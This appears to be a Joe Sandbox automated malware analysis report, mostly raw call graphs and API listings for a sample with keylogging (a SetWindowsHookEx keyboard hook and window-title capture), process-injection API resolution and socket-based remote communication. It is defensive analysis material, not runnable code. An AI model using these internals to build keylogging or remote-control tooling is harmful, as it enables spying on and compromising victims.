calls 47399->47413 47401 41c5dc 47402 41c603 47401->47402 47403 41c5f7 47401->47403 47415 41c7cf 26 API calls 47402->47415 47414 41c7b2 26 API calls 47403->47414 47406 41c601 47417 41c75a 26 API calls 47406->47417 47407 41c60f 47416 41c7cf 26 API calls 47407->47416 47410 41c63e 47410->47389 47411->47389 47412->47399 47413->47401 47414->47406 47415->47407 47416->47406 47417->47410 47419->47020 47420->47024 47421->47026 47424 402e85 47423->47424 47425 402e98 47424->47425 47427 402ea9 47424->47427 47428 402eae 47424->47428 47430 403445 28 API calls 47425->47430 47427->47035 47428->47427 47431 40225b 26 API calls 47428->47431 47430->47427 47431->47427 47433 404bd0 47432->47433 47436 40245c 47433->47436 47435 404be4 47435->47038 47437 402469 47436->47437 47439 402478 47437->47439 47440 402ad3 28 API calls 47437->47440 47439->47435 47440->47439 47441->47042 47442->47045 47444 401e94 47443->47444 47446 41a471 47445->47446 47447 41b168 GetCurrentProcess 47445->47447 47448 412513 RegOpenKeyExA 47446->47448 47447->47446 47449 412541 RegQueryValueExA RegCloseKey 47448->47449 47450 412569 47448->47450 47449->47450 47451 401f66 28 API calls 47450->47451 47452 41257e 47451->47452 47452->47059 47453->47067 47455 40b02f 47454->47455 47458 40b04b 47455->47458 47457 40b045 47457->47078 47459 40b055 47458->47459 47461 40b060 47459->47461 47462 40b138 28 API calls 47459->47462 47461->47457 47462->47461 47463->47082 47464->47084 47466 40230d 47465->47466 47467 402325 28 API calls 47466->47467 47468 401f80 47467->47468 47468->46811 47487 43a545 47469->47487 47471 43998b 47496 4392de 38 API calls 2 library calls 47471->47496 47472 439950 47472->47471 47473 439965 47472->47473 47486 40dd54 47472->47486 47494 445354 20 API calls __dosmaperr 47473->47494 47476 43996a 47495 43a827 26 API calls _Deallocate 47476->47495 47479 439997 47480 4399c6 47479->47480 47497 43a58a 42 API calls __Toupper 47479->47497 47483 439a32 47480->47483 47498 43a4f1 26 API calls 2 library calls 47480->47498 47499 43a4f1 26 API calls 2 library calls 47483->47499 47484 439af9 _strftime 47484->47486 47500 445354 20 API calls __dosmaperr 47484->47500 47486->46827 47486->46828 47488 43a54a 47487->47488 47489 43a55d 47487->47489 47501 445354 20 API calls __dosmaperr 47488->47501 47489->47472 47491 43a54f 47502 43a827 26 API calls _Deallocate 47491->47502 47493 43a55a 47493->47472 47494->47476 47495->47486 47496->47479 47497->47479 47498->47483 47499->47484 47500->47486 47501->47491 47502->47493 47507 401e9b 47503->47507 47505 4027d9 47505->47123 47506->47127 47508 401ea7 47507->47508 47509 40245c 28 API calls 47508->47509 47510 401eb9 47509->47510 47510->47505 47512 409855 47511->47512 47513 4124b7 3 API calls 47512->47513 47514 40985c 47513->47514 47515 409870 47514->47515 47516 40988a 47514->47516 47518 4095cf 47515->47518 47519 409875 47515->47519 47530 4082dc 47516->47530 47518->46863 47520 4082dc 28 API calls 47519->47520 47522 409883 47520->47522 47556 409959 29 API calls 47522->47556 47525 409888 47525->47518 47526->47153 47683 402d8b 47527->47683 47529 4028dd 47529->47156 47531 4082eb 47530->47531 47557 408431 47531->47557 47533 408309 47534 4098a5 47533->47534 47562 40affa 47534->47562 47537 4098f6 47539 401f66 28 API calls 47537->47539 47538 4098ce 47540 401f66 28 API calls 47538->47540 47541 409901 47539->47541 47542 4098d8 47540->47542 47544 401f66 28 API calls 47541->47544 47543 41ae08 28 API calls 47542->47543 47545 4098e6 47543->47545 47546 409910 47544->47546 47566 40a876 31 API calls ___crtLCMapStringA 47545->47566 47548 41a686 79 API calls 47546->47548 47550 409915 CreateThread 47548->47550 47549 4098ed 47551 401eea 26 API calls 47549->47551 47552 409930 CreateThread 47550->47552 47553 40993c CreateThread 47550->47553 47572 4099a9 47550->47572 47551->47537 47552->47553 47578 409993 47552->47578 47554 401e13 26 API calls 47553->47554 47575 4099b5 47553->47575 47555 409950 47554->47555 47555->47518 47556->47525 47682 40999f 134 API calls 47556->47682 47558 40843d 47557->47558 47560 40845b 47558->47560 47561 402f0d 28 API calls 47558->47561 47560->47533 47561->47560 47563 40b006 47562->47563 47564 4098c3 47563->47564 47567 403b9e 47563->47567 47564->47537 47564->47538 47566->47549 47568 403ba8 47567->47568 47570 403bb3 47568->47570 47571 403cfd 28 API calls 47568->47571 47570->47564 47571->47570 47581 409e48 47572->47581 47626 40a3f4 47575->47626 47664 4099e4 47578->47664 47582 409e5d Sleep 47581->47582 47601 409d97 47582->47601 47584 4099b2 47585 409e9d CreateDirectoryW 47589 409e6f 47585->47589 47586 409eae GetFileAttributesW 47586->47589 47587 409ec5 SetFileAttributesW 47587->47589 47589->47582 47589->47584 47589->47585 47589->47586 47589->47587 47591 401d64 28 API calls 47589->47591 47599 409f10 47589->47599 47614 41b58f 47589->47614 47590 409f3f PathFileExistsW 47590->47599 47591->47589 47592 401f86 28 API calls 47592->47599 47594 40a048 SetFileAttributesW 47594->47589 47595 401eef 26 API calls 47595->47599 47596 406052 28 API calls 47596->47599 47597 401eea 26 API calls 47597->47599 47599->47590 47599->47592 47599->47594 47599->47595 47599->47596 47599->47597 47600 401eea 26 API calls 47599->47600 47623 41b61a 32 API calls 47599->47623 47624 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 47599->47624 47600->47589 47602 409e44 47601->47602 47604 409dad 47601->47604 47602->47589 47603 409dcc CreateFileW 47603->47604 47605 409dda GetFileSize 47603->47605 47604->47603 47606 409e0f CloseHandle 47604->47606 47607 409e21 47604->47607 47608 409e04 Sleep 47604->47608 47609 409dfd 47604->47609 47605->47604 47605->47606 47606->47604 47607->47602 47611 4082dc 28 API calls 47607->47611 47608->47606 47625 40a7f0 83 API calls 47609->47625 47612 409e3d 47611->47612 47613 4098a5 125 API calls 47612->47613 47613->47602 47615 41b5a2 CreateFileW 47614->47615 47617 41b5db 47615->47617 47618 41b5df 47615->47618 47617->47589 47619 41b5f6 WriteFile 47618->47619 47620 41b5e6 SetFilePointer 47618->47620 47621 41b60b CloseHandle 47619->47621 47622 41b609 47619->47622 47620->47619 47620->47621 47621->47617 47622->47621 47623->47599 47624->47599 47625->47608 47632 40a402 47626->47632 47627 4099be 47628 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47629 40b027 28 API calls 47628->47629 47629->47632 47632->47627 47632->47628 47635 40a4a2 GetWindowTextW 47632->47635 47654 40a4bc 47632->47654 47655 433519 5 API calls __Init_thread_wait 47632->47655 47656 4338a5 29 API calls __onexit 47632->47656 47657 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47632->47657 47633 41aca0 GetTickCount 47633->47654 47635->47632 47637 401e13 26 API calls 47637->47654 47638 40a5ff 47640 401e13 26 API calls 47638->47640 47639 40affa 28 API calls 47639->47654 47640->47627 47641 40a569 Sleep 47641->47654 47644 401f66 28 API calls 47644->47654 47646 4082dc 28 API calls 47646->47654 47648 405ce6 28 API calls 47648->47654 47650 4028cf 28 API calls 47650->47654 47651 41ae08 28 API calls 47651->47654 47652 409d58 27 API calls 47652->47654 47653 401eea 26 API calls 47653->47654 47654->47632 47654->47633 47654->47637 47654->47638 47654->47639 47654->47641 47654->47644 47654->47646 47654->47648 47654->47650 47654->47651 47654->47652 47654->47653 47658 4082a8 28 API calls 47654->47658 47659 40a876 31 API calls ___crtLCMapStringA 47654->47659 47660 40b0dd 28 API calls 47654->47660 47661 40ae58 44 API calls 2 library calls 47654->47661 47662 440c51 26 API calls 47654->47662 47663 404c9e 28 API calls 47654->47663 47655->47632 47656->47632 47657->47632 47658->47654 47659->47654 47660->47654 47661->47654 47662->47654 47663->47654 47665 409a63 GetMessageA 47664->47665 47666 4099ff SetWindowsHookExA 47664->47666 47667 409a75 TranslateMessage DispatchMessageA 47665->47667 47679 40999c 47665->47679 47666->47665 47669 409a1b GetLastError 47666->47669 47667->47665 47667->47679 47680 41ad46 28 API calls 47669->47680 47671 409a31 47681 404c9e 28 API calls 47671->47681 47673 409a3e 47674 401f66 28 API calls 47673->47674 47675 409a4d 47674->47675 47676 41a686 79 API calls 47675->47676 47677 409a52 47676->47677 47678 401eea 26 API calls 47677->47678 47678->47679 47680->47671 47681->47673 47684 402d97 47683->47684 47687 4030f7 47684->47687 47686 402dab 47686->47529 47688 403101 47687->47688 47690 403115 47688->47690 47691 4036c2 28 API calls 47688->47691 47690->47686 47691->47690 47693 403b48 47692->47693 47699 403b7a 47693->47699 47696 403cbb 47703 403dc2 47696->47703 47698 403cc9 47698->47164 47700 403b86 47699->47700 47701 403b9e 28 API calls 47700->47701 47702 403b5a 47701->47702 47702->47696 47704 403dce 47703->47704 47707 402ffd 47704->47707 47706 403de3 47706->47698 47708 40300e 47707->47708 47713 4032a4 47708->47713 47712 40302e 47712->47706 47714 4032b0 47713->47714 47715 40301a 47713->47715 47719 4032b6 28 API calls 47714->47719 47715->47712 47718 4035e8 28 API calls 47715->47718 47718->47712 47726 4395ba 47720->47726 47724 412814 47723->47724 47725 4127ed RegSetValueExA RegCloseKey 47723->47725 47724->47187 47725->47724 47729 43953b 47726->47729 47728 401608 47728->47189 47730 43954a 47729->47730 47731 43955e 47729->47731 47737 445354 20 API calls __dosmaperr 47730->47737 47736 43955a __alldvrm 47731->47736 47739 447601 11 API calls 2 library calls 47731->47739 47733 43954f 47738 43a827 26 API calls _Deallocate 47733->47738 47736->47728 47737->47733 47738->47736 47739->47736 47743 41aab9 ctype ___scrt_fastfail 47740->47743 47741 401f66 28 API calls 47742 41ab2e 47741->47742 47742->47194 47743->47741 47744->47210 47746 413fb3 getaddrinfo WSASetLastError 47745->47746 47747 413fa9 47745->47747 47746->47239 47862 413e37 35 API calls ___std_exception_copy 47747->47862 47749 413fae 47749->47746 47751 404206 socket 47750->47751 47752 4041fd 47750->47752 47754 404220 47751->47754 47755 404224 CreateEventW 47751->47755 47863 404262 WSAStartup 47752->47863 47754->47239 47755->47239 47756 404202 47756->47751 47756->47754 47758 4049b1 47757->47758 47759 40492a 47757->47759 47758->47239 47760 404933 47759->47760 47761 404987 CreateEventA CreateThread 47759->47761 47762 404942 GetLocalTime 47759->47762 47760->47761 47761->47758 47866 404b1d 47761->47866 47864 41ad46 28 API calls 47762->47864 47764 40495b 47865 404c9e 28 API calls 47764->47865 47766 404968 47767 401f66 28 API calls 47766->47767 47768 404977 47767->47768 47769 41a686 79 API calls 47768->47769 47770 40497c 47769->47770 47771 401eea 26 API calls 47770->47771 47771->47761 47773 4043e1 47772->47773 47774 4042b3 47772->47774 47775 404343 47773->47775 47776 4043e7 WSAGetLastError 47773->47776 47774->47775 47777 4042e8 47774->47777 47780 404cbf 28 API calls 47774->47780 47775->47239 47776->47775 47778 4043f7 47776->47778 47870 420151 27 API calls 47777->47870 47781 4042f7 47778->47781 47782 4043fc 47778->47782 47784 4042d4 47780->47784 47787 401f66 28 API calls 47781->47787 47881 41bc76 30 API calls 47782->47881 47783 4042f0 47783->47781 47786 404306 47783->47786 47788 401f66 28 API calls 47784->47788 47797 404315 47786->47797 47798 40434c 47786->47798 47791 404448 47787->47791 47792 4042e3 47788->47792 47789 40440b 47882 404c9e 28 API calls 47789->47882 47794 401f66 28 API calls 47791->47794 47795 41a686 79 API calls 47792->47795 47793 404418 47796 401f66 28 API calls 47793->47796 47799 404457 47794->47799 47795->47777 47800 404427 47796->47800 47802 401f66 28 API calls 47797->47802 47878 420f34 55 API calls 47798->47878 47803 41a686 79 API calls 47799->47803 47804 41a686 79 API calls 47800->47804 47806 404324 47802->47806 47803->47775 47807 40442c 47804->47807 47805 404354 47808 404389 47805->47808 47809 404359 47805->47809 47810 401f66 28 API calls 47806->47810 47811 401eea 26 API calls 47807->47811 47880 4202ea 28 API calls 47808->47880 47812 401f66 28 API calls 47809->47812 47813 404333 47810->47813 47811->47775 47816 404368 47812->47816 47817 41a686 79 API calls 47813->47817 47815 404391 47818 4043be CreateEventW CreateEventW 47815->47818 47820 401f66 28 API calls 47815->47820 47819 401f66 28 API calls 47816->47819 47830 404338 47817->47830 47818->47775 47821 404377 47819->47821 47823 4043a7 47820->47823 47824 41a686 79 API calls 47821->47824 47825 401f66 28 API calls 47823->47825 47826 40437c 47824->47826 47827 4043b6 47825->47827 47879 420592 53 API calls 47826->47879 47829 41a686 79 API calls 47827->47829 47831 4043bb 47829->47831 47871 420191 47830->47871 47831->47818 47833 404805 SetEvent CloseHandle 47832->47833 47834 40481c closesocket 47832->47834 47835 40489c 47833->47835 47836 404829 47834->47836 47835->47239 47837 404838 47836->47837 47838 40483f 47836->47838 47885 404ab1 83 API calls 47837->47885 47840 404851 WaitForSingleObject 47838->47840 47841 404892 SetEvent CloseHandle 47838->47841 47842 420191 3 API calls 47840->47842 47841->47835 47843 404860 SetEvent WaitForSingleObject 47842->47843 47844 420191 3 API calls 47843->47844 47845 404878 SetEvent CloseHandle CloseHandle 47844->47845 47845->47841 47846->47239 47847->47239 47848->47239 47849->47239 47850->47239 47851->47239 47852->47277 47853->47277 47854->47277 47855->47277 47856->47277 47857->47277 47858->47277 47859->47277 47860->47277 47861->47277 47862->47749 47863->47756 47864->47764 47865->47766 47869 404b29 101 API calls 47866->47869 47868 404b26 47869->47868 47870->47783 47872 41dc15 47871->47872 47873 420199 47871->47873 47874 41dc23 47872->47874 47883 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47872->47883 47873->47775 47884 41d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47874->47884 47877 41dc2a 47878->47805 47879->47830 47880->47815 47881->47789 47882->47793 47883->47874 47884->47877 47885->47838 47887->47302 47888->47329 47889->47328 47890->47317 47891->47321 47892->47327 47895 40e56a 47893->47895 47894 4124b7 3 API calls 47894->47895 47895->47894 47896 40e60e 47895->47896 47898 40e5fe Sleep 47895->47898 47915 40e59c 47895->47915 47899 4082dc 28 API calls 47896->47899 47897 4082dc 28 API calls 47897->47915 47898->47895 47902 40e619 47899->47902 47901 41ae08 28 API calls 47901->47915 47903 41ae08 28 API calls 47902->47903 47904 40e625 47903->47904 47928 412774 29 API calls 47904->47928 47907 401e13 26 API calls 47907->47915 47908 40e638 47909 401e13 26 API calls 47908->47909 47911 40e644 47909->47911 47910 401f66 28 API calls 47910->47915 47912 401f66 28 API calls 47911->47912 47913 40e655 47912->47913 47916 4126d2 29 API calls 47913->47916 47914 4126d2 29 API calls 47914->47915 47915->47897 47915->47898 47915->47901 47915->47907 47915->47910 47915->47914 47926 40bf04 73 API calls ___scrt_fastfail 47915->47926 47927 412774 29 API calls 47915->47927 47917 40e668 47916->47917 47929 411699 TerminateProcess WaitForSingleObject 47917->47929 47919 40e670 ExitProcess 47930 411637 60 API calls 47925->47930 47927->47915 47928->47908 47929->47919

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                            • API String ID: 384173800-625181639
                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                            • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                            • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1276 4099e4-4099fd 1277 409a63-409a73 GetMessageA 1276->1277 1278 4099ff-409a19 SetWindowsHookExA 1276->1278 1279 409a75-409a8d TranslateMessage DispatchMessageA 1277->1279 1280 409a8f 1277->1280 1278->1277 1283 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1278->1283 1279->1277 1279->1280 1281 409a91-409a96 1280->1281 1283->1281
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                            • String ID: Keylogger initialization failure: error $`Wu
                                                                                            • API String ID: 3219506041-303027793
                                                                                            • Opcode ID: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                            • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                            • Opcode Fuzzy Hash: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                            • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                            • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                            • API String ID: 2281282204-3981147832
                                                                                            • Opcode ID: b52ee1c3eed207540671a46520d926d2e116572944b131f6506924d3268894c8
                                                                                            • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                            • Opcode Fuzzy Hash: b52ee1c3eed207540671a46520d926d2e116572944b131f6506924d3268894c8
                                                                                            • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1419 404915-404924 1420 4049b1 1419->1420 1421 40492a-404931 1419->1421 1422 4049b3-4049b7 1420->1422 1423 404933-404937 1421->1423 1424 404939-404940 1421->1424 1425 404987-4049af CreateEventA CreateThread 1423->1425 1424->1425 1426 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1424->1426 1425->1422 1426->1425
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                                            Strings
                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                            • API String ID: 2532271599-1507639952
                                                                                            • Opcode ID: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                            • Opcode Fuzzy Hash: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                            APIs
                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1815803762-0
                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                            • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                            • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                            APIs
                                                                                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Name$ComputerUser
                                                                                            • String ID:
                                                                                            • API String ID: 4229901323-0
                                                                                            • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                            • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a463 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 117 40d9e0-40d9e2 108->117 121 40d9e4-40d9e9 call 40699d call 4064d0 117->121 122 40d9ee-40da01 call 401d64 call 401e8f 117->122 121->122 122->107 138 40da03-40da09 122->138 163 